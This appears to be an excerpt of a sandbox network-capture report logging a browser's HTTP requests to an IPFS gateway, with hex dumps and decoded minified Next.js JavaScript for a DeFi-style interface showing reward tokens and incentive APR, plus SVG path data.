                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 33 31 35 5d 2c 7b 31 32 33 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 37 39 29 2c 69 3d 74 28 38 30 30 35 39 29 2c 6f 3d 74 28 33 30 31 32 30 29 2c 63 3d 74 28 32 39 36 33 30 29 2c 73 3d 74 28 38 31 36 34 35 29 2c 61 3d 74 28 36 37 32 39 34 29 2c 6c 3d 74 28 37 38 33 37 31 29 2c 64 3d 74 28 35 37 36 30 39 29 2c 70 3d 74 28 39 37 35 36 33 29 2c 78 3d 74 28 34 31 30 32 34 29 2c 75 3d 74 28 37 32 36 36 37 29 2c
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5315],{12349:function(e,n,t){t.d(n,{M:function(){return v}});var r=t(1279),i=t(80059),o=t(30120),c=t(29630),s=t(81645),a=t(67294),l=t(78371),d=t(57609),p=t(97563),x=t(41024),u=t(72667),
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 75 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 2c 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 30 70 78 22 2c 6d 72 3a 31 7d 7d 29 2c 28 30 2c 79 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 69 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 7d 29 5d 7d 29 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 79 2e 6a 73 78 29 28 73 2c 7b 69 6e 63 65 6e 74 69 76 65 41 50 52 3a 65 2e 69 6e 63 65 6e 74 69 76 65 41 50 52 7d 29 7d 2c 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 41 64 64 72 65 73 73 29 7d 29 29 2c 6e 2e 6c 65 6e 67 74 68 3e 31 26 26 28 30 2c 79 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65
                                                                                                                                                                                                                                                  Data Ascii: u.T1,{symbol:e.rewardTokenSymbol,sx:{fontSize:"20px",mr:1}}),(0,y.jsx)(c.Z,{variant:i,children:e.rewardTokenSymbol})]}),width:"100%",children:(0,y.jsx)(s,{incentiveAPR:e.incentiveAPR})},e.rewardTokenAddress)})),n.length>1&&(0,y.jsx)(o.Z,{sx:function(e){re
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 52 61 64 69 75 73 3a 22 34 70 78 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 70 61 63 69 74 79 20 30 2e 32 73 20 65 61 73 65 22 2c 62 67 63 6f 6c 6f 72 3a 76 3f 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 67 63 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 22 7d 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 64 2e 68 31 2e 56 49 45
                                                                                                                                                                                                                                                  Data Ascii: Radius:"4px",cursor:"pointer",display:"flex",alignItems:"center",justifyContent:"center",transition:"opacity 0.2s ease",bgcolor:v?"action.hover":"transparent","&:hover":{bgcolor:"action.hover",borderColor:"action.disabled"}}},onClick:function(){g(d.h1.VIE
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 73 79 6d 62 6f 6c 2c 74 3d 65 2e 76 61 6c 75 65 2c 61 3d 65 2e 69 6e 63 65 6e 74 69 76 65 73 2c 6c 3d 65 2e 76 61 72 69 61 6e 74 2c 64 3d 76 6f 69 64 20 30 3d 3d 3d 6c 3f 22 73 65 63 6f 6e 64 61 72 79 31 34 22 3a 6c 2c 70 3d 65 2e 73 79 6d 62 6f 6c 73 56 61 72 69 61 6e 74 2c 78 3d 65 2e 61 6c 69 67 6e 2c 75 3d 65 2e 63 6f 6c 6f 72 2c 66 3d 65 2e 74 6f 6f 6c 74 69 70 3b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 73 29 28 72 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 78 7c 7c 7b 78 73 3a 22 66 6c 65 78 2d 65 6e 64 22 2c 78 73 6d 3a 22 63 65 6e 74 65 72 22 7d 2c 6a 75 73 74 69
                                                                                                                                                                                                                                                  Data Ascii: unction(e){var n=e.symbol,t=e.value,a=e.incentives,l=e.variant,d=void 0===l?"secondary14":l,p=e.symbolsVariant,x=e.align,u=e.color,f=e.tooltip;return(0,s.jsxs)(r.Z,{sx:{display:"flex",flexDirection:"column",alignItems:x||{xs:"flex-end",xsm:"center"},justi
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 20 65 7d 76 61 72 20 6a 3d 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 70 3a 22 32 70 78 22 2c 6d 74 3a 22 32 70 78 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 6f 70 61 63 69 74 79 3a 2e 36 7d 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 63 6f 6c 6f 72 3b 72 65 74 75 72 6e 28 30 2c 78 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 6d 6c 3a 22 33 70 78 22 2c 63 6f 6c 6f 72 3a 6e 7c 7c 22 74 65 78 74 2e 6d 75 74 65 64 22 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 34 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 7d
                                                                                                                                                                                                                                                  Data Ascii: e}var j={borderRadius:"4px",display:"inline-flex",alignItems:"center",p:"2px",mt:"2px",cursor:"pointer","&:hover":{opacity:.6}},y=function(e){var n=e.color;return(0,x.jsx)(c.Z,{sx:{ml:"3px",color:n||"text.muted",fontSize:"14px"},children:(0,x.jsx)(o.Z,{}
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 2e 22 7d 29 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 6a 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 78 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 63 6f 6c 6f 72 3a 22 65 72 72 6f 72 2e 6d 61 69 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 55 6e 61 76 61 69 6c 61 62 6c 65 22 7d 29 7d 29 2c 28 30 2c 78 2e 6a 73 78 29 28 79 2c 7b 7d 29 5d 7d 29 7d 29 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 63 6f 6e 74 65 6e 74 3b 72 65 74 75 72 6e 28 30 2c 78 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 78 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 6d 62 3a
                                                                                                                                                                                                                                                  Data Ascii: ."})}),children:(0,x.jsxs)(a.Z,{sx:j,children:[(0,x.jsx)(l.Z,{variant:"description",color:"error.main",children:(0,x.jsx)(i.cC,{id:"Unavailable"})}),(0,x.jsx)(y,{})]})})},m=function(e){var n=e.content;return(0,x.jsxs)(a.Z,{children:[(0,x.jsx)(a.Z,{sx:{mb:
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 74 74 65 2e 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 3a 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 2c 22 20 74 72 61 6e 73 70 61 72 65 6e 74 22 29 2c 6d 62 3a 2e 35 7d 7d 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 69 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 62 6f 72 64 65 72 53 74 79 6c 65 3a 22 73 6f 6c 69 64 22 2c 62 6f 72 64 65 72 57 69 64 74 68 3a 22 34 70 78 20 34 70 78 20 30 20 34 70 78 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 22 2e 63 6f 6e 63 61 74 28 6e 21 3d 3d 61 7c 7c 74 3f 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 3a 65 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79
                                                                                                                                                                                                                                                  Data Ascii: tte.text.secondary:e.palette.divider," transparent"),mb:.5}}}),(0,s.jsx)(i.Z,{component:"span",sx:function(e){return{width:0,height:0,borderStyle:"solid",borderWidth:"4px 4px 0 4px",borderColor:"".concat(n!==a||t?e.palette.divider:e.palette.text.secondary
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 35 39 34 39 39 29 2c 69 3d 74 28 32 39 36 33 30 29 2c 6f 3d 28 74 28 36 37 32 39 34 29 2c 74 28 38 35 38 39 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 6e 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 6e 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65
                                                                                                                                                                                                                                                  Data Ascii: 59499),i=t(29630),o=(t(67294),t(85893));function c(e,n){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}re
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC449INData Raw: 63 74 69 6f 6e 28 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 6e 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 63 61 70 74 69 6f 6e 2c 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 72 3d 65 2e 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 2c 6c 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 22 73 65 63 6f 6e 64 61 72 79 31 36 22 3a 72 2c 70 3d 65 2e 63 61 70 74 69 6f 6e 43 6f 6c 6f 72 2c 78 3d 65 2e 61 6c 69 67 6e 2c 75 3d 76 6f 69 64 20 30 3d 3d 3d 78 3f 22 63 65 6e 74 65 72 22 3a 78 2c 66 3d 28 30 2c 69 2e 5a 29 28 65 2c 61 29 3b 72 65 74 75 72 6e 28 30 2c
                                                                                                                                                                                                                                                  Data Ascii: ction(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(t,n))}))}return e}var p=function(e){var n=e.caption,t=e.children,r=e.captionVariant,l=void 0===r?"secondary16":r,p=e.captionColor,x=e.align,u=void 0===x?"center":x,f=(0,i.Z)(e,a);return(0,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  95192.168.2.549815209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC504OUTGET /_next/static/chunks/5599-221be466b9fcb06f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 36944
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreicpczwah6ggvvqgay3njusbksql3bir5ikm56azlk3f25yxhlmnem"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/5599-221be466b9fcb06f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreicpczwah6ggvvqgay3njusbksql3bir5ikm56azlk3f25yxhlmnem
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028481
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 37 65 61 39 61 31 39 39 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e437ea9a199d-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 35 39 39 5d 2c 7b 35 32 30 39 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 65 29 7b 76 61 72 20 74 2c 6c 2c 6e 2c 72 2c 69 2c 73 2c 6f 3d 65 28 36 37 32 39 34 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 29 7b 72 65 74 75 72 6e 20 66 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 63 3d 31 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 66 6f 72 28 76 61
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5599],{5209:function(a,c,e){var t,l,n,r,i,s,o=e(67294);function f(){return f=Object.assign?Object.assign.bind():function(a){for(var c=1;c<arguments.length;c++){var e=arguments[c];for(va
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 32 33 33 20 34 2e 30 36 39 2d 2e 33 36 33 20 38 2e 31 34 31 2d 2e 35 37 39 20 31 32 2e 32 30 38 2d 2e 31 32 36 20 32 2e 35 33 2d 2e 32 39 37 20 35 2e 30 35 38 2d 2e 34 36 20 37 2e 35 38 37 2d 2e 32 30 34 20 33 2e 34 36 33 2d 2e 34 31 37 20 36 2e 39 32 35 2d 2e 36 30 39 20 31 30 2e 33 39 61 33 33 34 2e 32 32 32 20 33 33 34 2e 32 32 32 20 30 20 30 20 30 2d 2e 32 38 39 20 36 2e 31 63 2d 2e 33 31 34 20 38 2e 39 2e 33 32 31 20 31 37 2e 37 30 38 20 32 2e 34 34 39 20 32 36 2e 33 38 33 2e 37 31 20 32 2e 38 38 34 20 31 2e 34 31 36 20 35 2e 37 37 33 20 31 2e 39 39 39 20 38 2e 36 38 34 61 31 38 2e 31 37 35 20 31 38 2e 31 37 35 20 30 20 30 20 31 2d 31 2e 30 33 20 31 30 2e 36 39 31 63 2d 31 2e 38 31 20 34 2e 33 39 34 2d 35 2e 37 38 33 20 36 2e 31 36 35 2d 39 2e 37 33
                                                                                                                                                                                                                                                  Data Ascii: 233 4.069-.363 8.141-.579 12.208-.126 2.53-.297 5.058-.46 7.587-.204 3.463-.417 6.925-.609 10.39a334.222 334.222 0 0 0-.289 6.1c-.314 8.9.321 17.708 2.449 26.383.71 2.884 1.416 5.773 1.999 8.684a18.175 18.175 0 0 1-1.03 10.691c-1.81 4.394-5.783 6.165-9.73
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 31 31 37 2e 35 31 38 2d 32 2e 38 39 36 20 31 2e 33 31 33 61 2e 34 31 32 2e 34 31 32 20 30 20 30 20 30 2d 2e 31 32 2e 32 39 35 63 2d 2e 30 31 33 2e 31 36 2e 30 32 38 2e 33 32 2e 31 31 36 2e 34 35 34 61 2e 34 36 2e 34 36 20 30 20 30 20 30 20 2e 34 32 34 2e 31 31 35 63 2e 33 2d 2e 31 33 33 2e 35 38 34 2d 2e 33 30 32 2e 38 34 34 2d 2e 35 30 34 61 32 2e 37 33 32 20 32 2e 37 33 32 20 30 20 30 20 31 20 32 2e 37 39 35 2d 2e 33 35 39 63 2e 34 35 2e 31 39 34 2e 38 38 33 2e 34 32 34 20 31 2e 32 39 35 2e 36 38 39 61 2e 33 35 32 2e 33 35 32 20 30 20 30 20 31 20 2e 31 30 34 2e 32 39 35 2e 33 36 32 2e 33 36 32 20 30 20 30 20 31 2d 2e 31 36 38 2e 32 36 35 63 2d 2e 31 39 36 2e 30 39 37 2d 2e 34 2e 31 38 31 2d 2e 36 30 33 2e 32 36 38 61 37 2e 36 39 33 20 37 2e 36 39 33 20
                                                                                                                                                                                                                                                  Data Ascii: 117.518-2.896 1.313a.412.412 0 0 0-.12.295c-.013.16.028.32.116.454a.46.46 0 0 0 .424.115c.3-.133.584-.302.844-.504a2.732 2.732 0 0 1 2.795-.359c.45.194.883.424 1.295.689a.352.352 0 0 1 .104.295.362.362 0 0 1-.168.265c-.196.097-.4.181-.603.268a7.693 7.693
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 20 31 2d 39 2e 34 35 2e 33 35 36 20 37 2e 33 33 20 37 2e 33 33 20 30 20 30 20 31 2d 32 2e 31 31 37 2d 32 2e 36 35 36 63 2d 2e 33 31 33 2d 2e 36 34 31 2d 2e 35 33 39 2d 31 2e 33 32 36 2d 2e 38 32 36 2d 31 2e 39 38 61 31 35 2e 35 39 20 31 35 2e 35 39 20 30 20 30 20 30 2d 2e 39 39 36 2d 32 2e 30 38 32 63 2d 2e 39 32 32 2d 31 2e 34 36 35 2d 32 2e 33 38 38 2d 31 2e 37 38 35 2d 33 2e 38 34 2d 2e 38 32 34 61 31 35 2e 37 34 35 20 31 35 2e 37 34 35 20 30 20 30 20 30 2d 31 2e 38 37 33 20 31 2e 36 31 32 63 2d 2e 37 32 38 2e 36 37 2d 31 2e 33 39 36 20 31 2e 34 30 34 2d 32 2e 31 35 20 32 2e 30 35 2d 32 2e 34 33 33 20 32 2e 30 38 2d 35 2e 32 34 20 32 2e 36 32 32 2d 38 2e 33 33 39 20 31 2e 39 36 35 61 38 2e 38 39 33 20 38 2e 38 39 33 20 30 20 30 20 31 2d 35 2e 36 33 35
                                                                                                                                                                                                                                                  Data Ascii: 1-9.45.356 7.33 7.33 0 0 1-2.117-2.656c-.313-.641-.539-1.326-.826-1.98a15.59 15.59 0 0 0-.996-2.082c-.922-1.465-2.388-1.785-3.84-.824a15.745 15.745 0 0 0-1.873 1.612c-.728.67-1.396 1.404-2.15 2.05-2.433 2.08-5.24 2.622-8.339 1.965a8.893 8.893 0 0 1-5.635
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 38 37 2e 32 39 34 63 33 2e 39 35 39 2e 32 35 38 20 37 2e 39 33 33 2d 31 2e 35 31 33 20 39 2e 37 33 34 2d 35 2e 39 30 38 61 31 38 2e 31 37 38 20 31 38 2e 31 37 38 20 30 20 30 20 30 20 31 2e 30 35 35 2d 31 30 2e 36 38 38 63 2d 2e 35 38 34 2d 32 2e 39 31 32 2d 31 2e 32 38 39 2d 35 2e 38 2d 31 2e 39 39 39 2d 38 2e 36 38 35 2d 32 2e 31 32 38 2d 38 2e 36 37 34 2d 32 2e 37 36 33 2d 31 37 2e 34 38 32 2d 32 2e 34 34 39 2d 32 36 2e 33 38 33 2e 30 36 39 2d 32 2e 30 33 33 2e 31 36 35 2d 34 2e 30 36 37 2e 32 38 39 2d 36 2e 31 2e 31 39 32 2d 33 2e 34 36 34 2e 33 38 34 2d 36 2e 39 32 39 2e 36 30 39 2d 31 30 2e 33 39 2e 31 35 2d 32 2e 35 33 2e 33 32 31 2d 35 2e 30 35 38 2e 34 35 39 2d 37 2e 35 38 36 2e 32 2d 34 2e 30 37 2e 33 33 2d 38 2e 31 34 32 2e 35 37 39 2d 31 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 87.294c3.959.258 7.933-1.513 9.734-5.908a18.178 18.178 0 0 0 1.055-10.688c-.584-2.912-1.289-5.8-1.999-8.685-2.128-8.674-2.763-17.482-2.449-26.383.069-2.033.165-4.067.289-6.1.192-3.464.384-6.929.609-10.39.15-2.53.321-5.058.459-7.586.2-4.07.33-8.142.579-12.
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 31 2e 36 38 36 2d 31 2e 33 37 34 20 32 2e 38 39 37 2d 31 2e 33 31 34 20 32 2e 32 35 33 2e 30 39 39 20 33 2e 38 33 31 20 31 2e 32 32 37 20 34 2e 39 32 20 33 2e 31 31 37 2e 34 31 2e 37 31 39 2e 37 31 37 20 31 2e 34 39 35 20 31 2e 31 33 35 20 32 2e 31 38 39 2e 34 37 2e 38 37 20 31 2e 30 31 34 20 31 2e 36 39 39 20 31 2e 36 32 36 20 32 2e 34 37 35 61 36 2e 31 33 32 20 36 2e 31 33 32 20 30 20 30 20 30 20 38 2e 33 34 35 2e 39 32 32 20 39 2e 31 37 32 20 39 2e 31 37 32 20 30 20 30 20 30 20 31 2e 39 38 38 2d 32 2e 31 38 38 63 2e 34 34 33 2d 2e 36 33 32 2e 38 35 32 2d 31 2e 32 38 39 20 31 2e 33 33 2d 31 2e 39 30 35 61 37 2e 30 34 36 20 37 2e 30 34 36 20 30 20 30 20 31 20 31 2e 31 36 36 2d 31 2e 31 35 35 20 33 2e 35 32 32 20 33 2e 35 32 32 20 30 20 30 20 31 20 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 1.686-1.374 2.897-1.314 2.253.099 3.831 1.227 4.92 3.117.41.719.717 1.495 1.135 2.189.47.87 1.014 1.699 1.626 2.475a6.132 6.132 0 0 0 8.345.922 9.172 9.172 0 0 0 1.988-2.188c.443-.632.852-1.289 1.33-1.905a7.046 7.046 0 0 1 1.166-1.155 3.522 3.522 0 0 1 2.
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 37 33 2d 2e 32 32 36 61 37 2e 33 38 34 20 37 2e 33 38 34 20 30 20 30 20 30 20 2e 34 37 38 20 33 2e 35 31 32 20 36 2e 33 39 31 20 36 2e 33 39 31 20 30 20 30 20 30 20 32 2e 36 39 36 20 33 2e 34 33 38 63 2e 37 32 35 2e 33 38 34 20 31 2e 34 39 2e 36 39 20 32 2e 32 37 39 2e 39 31 32 2e 32 30 35 2e 30 37 33 2e 35 38 31 2e 32 30 33 2e 36 35 39 2d 2e 31 38 33 2e 30 31 32 2d 2e 31 31 2d 2e 32 33 35 2d 2e 33 32 2d 2e 34 30 35 2d 2e 34 32 31 2d 2e 33 32 38 2d 2e 31 39 2d 2e 37 31 2d 2e 33 30 34 2d 31 2e 30 32 32 2d 2e 35 33 61 33 2e 37 34 36 20 33 2e 37 34 36 20 30 20 30 20 31 2d 31 2e 37 35 2d 32 2e 36 37 20 31 2e 36 31 20 31 2e 36 31 20 30 20 30 20 31 20 2e 36 34 33 2d 31 2e 35 39 33 63 2e 32 36 32 2d 2e 32 2e 35 37 35 2d 2e 33 34 36 2e 38 32 2d 2e 35 35 32 61 31
